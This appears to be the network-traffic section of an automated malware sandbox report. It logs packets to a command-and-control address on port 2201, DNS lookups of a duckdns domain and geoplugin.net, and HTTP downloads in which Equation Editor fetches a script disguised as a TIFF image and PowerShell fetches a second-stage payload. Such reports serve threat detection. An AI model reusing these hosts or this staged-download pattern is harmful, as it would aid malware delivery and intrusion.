                          Sep 6, 2024 11:26:10.894085884 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894097090 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894097090 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894119978 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894695997 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894715071 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894726038 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894740105 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894753933 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.894779921 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894798040 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894808054 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.894819021 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896156073 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896156073 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896183968 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896204948 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896219969 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896220922 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896234035 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896251917 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.896312952 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896333933 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.896349907 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.898498058 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908164024 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908174992 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908183098 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908262968 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908273935 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908288956 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908299923 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908310890 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908323050 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908344984 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908550024 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908588886 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908626080 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908658028 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908713102 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908724070 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908749104 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908826113 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908837080 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908847094 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908868074 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908911943 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908924103 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908934116 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908947945 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908950090 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908960104 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908971071 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908971071 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.908983946 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.908993959 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.909020901 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.910804987 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920367002 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920406103 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920416117 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920455933 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920494080 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920505047 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920515060 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920526028 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920540094 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920546055 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.920640945 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.920681953 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938498020 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938565016 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938575983 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938616037 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938632011 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938642979 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938664913 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938678026 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938702106 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938754082 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938762903 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938775063 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938810110 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938815117 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938827038 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938837051 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938853979 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938858032 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938868046 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938879013 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938890934 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.938910007 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.938910007 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939388037 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939424992 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939443111 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939455032 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939481974 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939536095 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939548016 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939557076 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939568996 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.939582109 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939596891 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.939975977 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940059900 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940071106 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940082073 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940089941 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940092087 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940108061 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940115929 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940126896 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940138102 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940145969 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940149069 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940167904 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940589905 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940601110 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940609932 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940619946 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940627098 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940632105 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940642118 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940644026 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940655947 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.940661907 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.940690041 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.941293001 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.959472895 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:10.959522963 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:16.209307909 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.214411974 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.214498997 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.214895010 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.214953899 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.219348907 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.219417095 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.219578981 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.219635010 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.219860077 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.219907045 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.220103025 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.220160961 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.228398085 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.228462934 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.228511095 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.228523016 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.228532076 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229043007 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229079008 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229239941 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229275942 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.229546070 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:16.239228010 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.239275932 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.239537954 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.240961075 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:16.241019964 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:19.053184032 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:19.091228962 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:19.097364902 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:49.277864933 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:49.279304981 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:49.284163952 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:27:19.406217098 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:27:19.409634113 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:27:19.414628983 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:27:26.227190018 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:26.554229021 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:27.162621021 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:28.363831043 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:30.781841040 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:35.602333069 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:45.211885929 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:27:49.658801079 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:27:49.660257101 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:27:49.665066004 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:28:19.744287014 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:28:19.745891094 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:28:19.750874043 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:28:49.960258961 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:28:49.962450027 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:28:49.967274904 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:29:20.219898939 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:29:20.221688986 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:29:20.226563931 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:29:50.509773016 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:29:50.511310101 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:29:50.516192913 CEST22014916445.89.247.65192.168.2.22
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 6, 2024 11:26:01.949716091 CEST5456253192.168.2.228.8.8.8
                          Sep 6, 2024 11:26:01.956175089 CEST53545628.8.8.8192.168.2.22
                          Sep 6, 2024 11:26:05.716976881 CEST5291753192.168.2.228.8.8.8
                          Sep 6, 2024 11:26:06.728667974 CEST5291753192.168.2.228.8.8.8
                          Sep 6, 2024 11:26:07.744129896 CEST5291753192.168.2.228.8.8.8
                          Sep 6, 2024 11:26:07.825788021 CEST53529178.8.8.8192.168.2.22
                          Sep 6, 2024 11:26:09.324975014 CEST6275153192.168.2.228.8.8.8
                          Sep 6, 2024 11:26:09.333816051 CEST53627518.8.8.8192.168.2.22
                          Sep 6, 2024 11:26:10.723718882 CEST53529178.8.8.8192.168.2.22
                          Sep 6, 2024 11:26:10.841609955 CEST53529178.8.8.8192.168.2.22
                          TimestampSource IPDest IPChecksumCodeType
                          Sep 6, 2024 11:26:10.723783016 CEST192.168.2.228.8.8.8d009(Port unreachable)Destination Unreachable
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 6, 2024 11:26:01.949716091 CEST192.168.2.228.8.8.80x8492Standard query (0)archive.orgA (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:05.716976881 CEST192.168.2.228.8.8.80xcdc8Standard query (0)dremom2.duckdns.orgA (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:06.728667974 CEST192.168.2.228.8.8.80xcdc8Standard query (0)dremom2.duckdns.orgA (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:07.744129896 CEST192.168.2.228.8.8.80xcdc8Standard query (0)dremom2.duckdns.orgA (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:09.324975014 CEST192.168.2.228.8.8.80x3f04Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 6, 2024 11:26:01.956175089 CEST8.8.8.8192.168.2.220x8492No error (0)archive.org207.241.224.2A (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:07.825788021 CEST8.8.8.8192.168.2.220xcdc8No error (0)dremom2.duckdns.org45.89.247.65A (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:09.333816051 CEST8.8.8.8192.168.2.220x3f04No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:10.723718882 CEST8.8.8.8192.168.2.220xcdc8Server failure (2)dremom2.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                          Sep 6, 2024 11:26:10.841609955 CEST8.8.8.8192.168.2.220xcdc8No error (0)dremom2.duckdns.org45.89.247.65A (IP address)IN (0x0001)false
                          • archive.org
                          • 85.239.241.184
                          • geoplugin.net
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.224916185.239.241.184803616C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          TimestampBytes transferredDirectionData
                          Sep 6, 2024 11:25:58.202282906 CEST344OUTGET /35/wescreenthepicturewithbuttersmoothpy.tIF HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 85.239.241.184
                          Connection: Keep-Alive
                          Sep 6, 2024 11:25:58.698981047 CEST1236INHTTP/1.1 200 OK
                          Date: Fri, 06 Sep 2024 09:25:58 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 06 Sep 2024 06:45:03 GMT
                          ETag: "2fc10-6216dbf388e55"
                          Accept-Ranges: bytes
                          Content-Length: 195600
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: image/tiff
                          Data Raw: ff fe 0d 00 0a 00 57 00 55 00 5a 00 57 00 75 00 51 00 50 00 57 00 49 00 42 00 65 00 63 00 20 00 3d 00 20 00 22 00 6d 00 6a 00 6c 00 6b 00 5a 00 4c 00 4f 00 6f 00 72 00 6c 00 42 00 7a 00 22 00 0d 00 0a 00 6b 00 61 00 71 00 4c 00 4c 00 78 00 57 00 78 00 4c 00 51 00 4c 00 68 00 20 00 3d 00 20 00 22 00 62 00 63 00 50 00 6b 00 4f 00 48 00 57 00 7a 00 69 00 4c 00 63 00 57 00 22 00 0d 00 0a 00 63 00 4e 00 47 00 50 00 6b 00 4c 00 6d 00 63 00 51 00 75 00 4a 00 66 00 20 00 3d 00 20 00 22 00 63 00 48 00 68 00 68 00 57 00 41 00 47 00 4c 00 41 00 6b 00 6d 00 76 00 22 00 0d 00 0a 00 6a 00 6b 00 67 00 6c 00 54 00 57 00 65 00 47 00 69 00 4a 00 4b 00 6e 00 20 00 3d 00 20 00 22 00 65 00 5a 00 4f 00 4c 00 6d 00 70 00 70 00 54 00 42 00 4c 00 4c 00 4c 00 22 00 0d 00 0a 00 4b 00 78 00 57 00 5a 00 42 00 74 00 48 00 74 00 6f 00 68 00 7a 00 64 00 20 00 3d 00 20 00 22 00 65 00 69 00 76 00 75 00 4c 00 61 00 55 00 6a 00 7a 00 4c 00 78 00 73 00 22 00 0d 00 0a 00 69 00 6b 00 68 00 43 00 57 00 4b 00 63 00 52 00 49 00 43 00 57 00 [TRUNCATED]
                          Data Ascii: WUZWuQPWIBec = "mjlkZLOorlBz"kaqLLxWxLQLh = "bcPkOHWziLcW"cNGPkLmcQuJf = "cHhhWAGLAkmv"jkglTWeGiJKn = "eZOLmppTBLLL"KxWZBtHtohzd = "eivuLaUjzLxs"ikhCWKcRICWW = "fGWfqcziitGC"muehWPvuLTUa = "fLLWBkKWKqtx"KLkvWWWSlzvd = "obvaguearBLeafLLP"zkOLeaZobhRU = "ltPWLkmLAWmK"hPizApZdUodh = "WkUmjUovaguearhzS"skNlenKrenQx = "BeceziGxLAim"dNAqoZGLUPfz = "hWbZhppWlTuU"GabWdqNhhmuZ = "tQQKUxiWRIaL"mhtTUbomWKtc = "WLrzIuRcLcIl"gfGWLhGemkmK
                          Sep 6, 2024 11:25:58.699003935 CEST224INData Raw: 00 20 00 3d 00 20 00 22 00 43 00 47 00 66 00 63 00 57 00 7a 00 41 00 4b 00 70 00 64 00 6d 00 6f 00 22 00 0d 00 0a 00 75 00 6f 00 6d 00 52 00 4e 00 6b 00 52 00 4b 00 43 00 71 00 42 00 6f 00 20 00 3d 00 20 00 22 00 57 00 43 00 63 00 63 00 71 00 62
                          Data Ascii: = "CGfcWzAKpdmo"uomRNkRKCqBo = "WCccqbedfZmG"QHLAWLUrbncL = "tNPqfLhOiWUi"LoTKcxcLLWRh = "mWcULitGzSZi"
                          Sep 6, 2024 11:25:58.699014902 CEST1236INData Raw: 00 0d 00 0a 00 7a 00 4f 00 52 00 6b 00 62 00 50 00 69 00 6e 00 4e 00 6d 00 4c 00 6f 00 20 00 3d 00 20 00 22 00 4c 00 74 00 6b 00 69 00 4a 00 4f 00 7a 00 4c 00 74 00 62 00 6e 00 65 00 22 00 0d 00 0a 00 66 00 4e 00 63 00 63 00 4e 00 74 00 6b 00 7a
                          Data Ascii: zORkbPinNmLo = "LtkiJOzLtbne"fNccNtkzlAQW = "czfnbuleiKOi"niOdffGedPKG = "GdCtPdUKZhih"iWeCuTiCUGkU = "JZfKBZLAZi
                          Sep 6, 2024 11:25:58.699027061 CEST1236INData Raw: 00 68 00 52 00 4a 00 67 00 68 00 22 00 0d 00 0a 00 4b 00 4b 00 47 00 50 00 41 00 63 00 6f 00 4b 00 69 00 48 00 61 00 55 00 20 00 3d 00 20 00 22 00 47 00 57 00 71 00 47 00 42 00 6d 00 74 00 75 00 55 00 41 00 64 00 42 00 22 00 0d 00 0a 00 6d 00 48
                          Data Ascii: hRJgh"KKGPAcoKiHaU = "GWqGBmtuUAdB"mHeKiikjcicx = "mAUHWJdiGhle"pkkvCcWKezkK = "KGOvaguearKpNuLZK"nWfLGcsAhqNu =
                          Sep 6, 2024 11:25:58.699038029 CEST1236INData Raw: 00 0a 00 0d 00 0a 00 72 00 63 00 4c 00 42 00 69 00 54 00 63 00 6f 00 6d 00 63 00 55 00 41 00 20 00 3d 00 20 00 22 00 47 00 6f 00 6d 00 4b 00 6c 00 54 00 62 00 65 00 47 00 74 00 6c 00 62 00 22 00 0d 00 0a 00 6d 00 6a 00 57 00 52 00 4c 00 43 00 6b
                          Data Ascii: rcLBiTcomcUA = "GomKlTbeGtlb"mjWRLCkRKzck = "JcOCLUGLfxpW"xpLxmLBUWWLm = "iHxezlWWdAGQ"mJcGegkhhsfa = "aePkJAiei
                          Sep 6, 2024 11:25:58.699049950 CEST1236INData Raw: 00 41 00 6d 00 78 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 55 00 7a 00 4b 00 63 00 4c 00 69 00 50 00 4c 00 73 00 57 00 57 00 6f 00 20 00 3d 00 20 00 22 00 62 00 4a 00 6b 00 57 00 4b 00 6b 00 6d 00 76 00 4c 00 43 00 51 00 75 00 22 00 0d 00 0a 00 6f
                          Data Ascii: AmxL"UzKcLiPLsWWo = "bJkWKkmvLCQu"oWqZfbWollWP = "qlcNqztoIGfL"KxecqniSKUeS = "fLLmiaLmLIWG"zmrlezzieRWc = "rbv
                          Sep 6, 2024 11:25:58.699060917 CEST1236INData Raw: 00 3d 00 20 00 22 00 64 00 6f 00 4c 00 71 00 41 00 4b 00 66 00 5a 00 49 00 7a 00 57 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 4c 00 65 00 41 00 64 00 63 00 66 00 72 00 43 00 69 00 55 00 6f 00 74 00 20 00 3d 00 20 00 22 00 57 00 52 00 72 00 69 00 57
                          Data Ascii: = "doLqAKfZIzWi"LeAdcfrCiUot = "WRriWcirdRuL"WKxmxLCaZKWA = "KWSCpLKtZUUc"ldZhzKfnWlAW = "HJuzauKNQpWk"nAciiSKo
                          Sep 6, 2024 11:25:58.699074030 CEST552INData Raw: 00 41 00 61 00 76 00 4c 00 48 00 20 00 3d 00 20 00 22 00 76 00 57 00 4b 00 62 00 57 00 63 00 4c 00 53 00 55 00 70 00 4e 00 52 00 22 00 0d 00 0a 00 4b 00 47 00 42 00 69 00 65 00 66 00 4b 00 6f 00 52 00 6f 00 4b 00 53 00 20 00 3d 00 20 00 22 00 7a
                          Data Ascii: AavLH = "vWKbWcLSUpNR"KGBiefKoRoKS = "zgGTBGKOPiqc"eNULatpRKWki = "zaKGhBKWxLeA"PoTUKuCfaoHp = "OWeZsLcULiNk"GOAt
                          Sep 6, 2024 11:25:58.699083090 CEST1236INData Raw: 00 53 00 65 00 67 00 6b 00 68 00 52 00 70 00 53 00 20 00 3d 00 20 00 22 00 4c 00 75 00 4c 00 4c 00 71 00 50 00 41 00 57 00 6f 00 76 00 57 00 4c 00 22 00 0d 00 0a 00 69 00 47 00 74 00 62 00 6b 00 41 00 68 00 4c 00 62 00 4b 00 62 00 62 00 20 00 3d
                          Data Ascii: SegkhRpS = "LuLLqPAWovWL"iGtbkAhLbKbb = "PfkWqvNWokBc"iZRtLRrocbLk = "eLfnUGvLScKQ"KWdlLLOufLIa = "WKmWLLLUNoUo"
                          Sep 6, 2024 11:25:58.699099064 CEST1236INData Raw: 00 0d 00 0a 00 4e 00 5a 00 57 00 7a 00 4b 00 62 00 6b 00 65 00 6a 00 63 00 6d 00 78 00 20 00 3d 00 20 00 22 00 67 00 65 00 52 00 6b 00 62 00 70 00 74 00 65 00 67 00 4c 00 69 00 47 00 22 00 0d 00 0a 00 6e 00 7a 00 55 00 6c 00 4e 00 57 00 67 00 4c
                          Data Ascii: NZWzKbkejcmx = "geRkbptegLiG"nzUlNWgLhbeT = "oWkxesHBzUKA"uLZRptcemNGc = "LhWeOAUhWCjW"TKmippUfCPiW = "bWcWkRhb
                          Sep 6, 2024 11:25:58.704085112 CEST1236INData Raw: 00 73 00 74 00 4b 00 4b 00 7a 00 22 00 0d 00 0a 00 54 00 6f 00 68 00 55 00 65 00 69 00 66 00 63 00 4f 00 52 00 57 00 47 00 20 00 3d 00 20 00 22 00 75 00 4b 00 57 00 4c 00 43 00 53 00 47 00 6f 00 4a 00 4e 00 4e 00 47 00 22 00 0d 00 0a 00 47 00 6b
                          Data Ascii: stKKz"TohUeifcORWG = "uKWLCSGoJNNG"GkWLccpiKAUi = "AGWGLLbWmKZA"WzxlzZKPZBjo = "mlbkWUqNzKiz"ZzmGdLonSpqc = "Cz


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.224916385.239.241.184803900C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Sep 6, 2024 11:26:04.468487024 CEST77OUTGET /35/WERFFG.txt HTTP/1.1
                          Host: 85.239.241.184
                          Connection: Keep-Alive
                          Sep 6, 2024 11:26:04.968209982 CEST1236INHTTP/1.1 200 OK
                          Date: Fri, 06 Sep 2024 09:26:04 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 06 Sep 2024 06:34:48 GMT
                          ETag: "a1000-6216d9a8db95a"
                          Accept-Ranges: bytes
                          Content-Length: 659456
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/plain
